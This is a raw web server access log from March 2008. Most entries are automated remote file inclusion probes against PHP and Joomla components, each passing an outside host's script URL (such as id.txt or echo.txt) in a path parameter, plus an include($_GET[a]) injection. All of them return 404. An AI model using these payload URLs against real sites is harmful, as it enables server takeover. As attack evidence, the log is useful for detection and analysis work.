211.115.213.247 - - [23/Mar/2008:06:55:00 -0700] "GET /index.php?body=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:55:01 -0700] "GET /logs/index.php?body=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:55:05 -0700] "GET /logs/access_080117.log//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:55:05 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.110 - - [23/Mar/2008:06:55:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.90 - - [23/Mar/2008:06:55:51 -0700] "GET /logs/access_080220.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:06:56:01 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:06:56:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:06:56:04 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:56:22 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.214.234 - - [23/Mar/2008:06:56:23 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:06:56:24 -0700] "GET /errors.php?error=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:06:56:24 -0700] "GET /logs/errors.php?error=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:56:49 -0700] "GET /comments-display-tpl.php?language_file=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:56:49 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:57:05 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:57:06 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:57:06 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.102 - - [23/Mar/2008:06:57:25 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:06:57:36 -0700] "GET /comments-display-tpl.php?language_file=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:06:57:36 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:06:57:50 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:06:57:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:58:02 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:58:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:06:58:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:58:24 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:58:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:58:24 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.18.76 - - [23/Mar/2008:06:58:44 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [23/Mar/2008:06:58:49 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:06:59:01 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:06:59:01 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.6.20.170 - - [23/Mar/2008:06:59:29 -0700] "GET /logs/access_070810.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:06:59:33 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:59:39 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:59:41 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:59:43 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:06:59:48 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:59:59 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:59:59 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:59:59 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:00:02 -0700] "GET /logs/access_080131.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:00:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:00:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:07:00:11 -0700] "GET /logs/access_080312.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:07:00:12 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:07:00:36 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:00:56 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:00:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:00:57 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:01:00 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:01:01 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:01:01 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:01:10 -0700] "GET /logs/access_080225.log/index.php?body=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:01:25 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:01:25 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:01:26 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:01:39 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:01:49 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:01:49 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:01:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:07:02:29 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:07:02:39 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:02:49 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:02:49 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:02:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:02:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:07:03:39 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:07:03:39 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.83.155.102 - - [23/Mar/2008:07:03:40 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:00 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:01 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:02 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:03 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:03 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:04:04 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:04:52 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.208.244 - - [23/Mar/2008:07:05:10 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [23/Mar/2008:07:05:11 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [23/Mar/2008:07:05:11 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:05:15 -0700] "GET /logs/access_071231.log/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.208.244 - - [23/Mar/2008:07:05:15 -0700] "GET /logs/access_080131.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:05:15 -0700] "GET /modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:07:05:15 -0700] "GET /logs/access_080220.log//skin/zero_vote/ask_password.php?dir=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:05:16 -0700] "GET /logs/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:05:30 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:05:35 -0700] "GET /logs/access_080101.log/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.190.202.154 - - [23/Mar/2008:07:06:07 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
80.190.202.154 - - [23/Mar/2008:07:06:07 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:07:06:24 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
209.150.128.201 - - [23/Mar/2008:07:06:32 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.150.128.201 - - [23/Mar/2008:07:06:32 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.150.128.201 - - [23/Mar/2008:07:06:32 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:06:34 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:06:39 -0700] "GET //index.php?option=com_mtree&task=view&Itemid=&mosConfig_absolute_path=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:06:42 -0700] "GET /logs//index.php?option=com_mtree&task=view&Itemid=&mosConfig_absolute_path=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.150.128.201 - - [23/Mar/2008:07:06:54 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:07:07:09 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:07:07:29 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:07:07:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:07:07:29 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:07:07:46 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
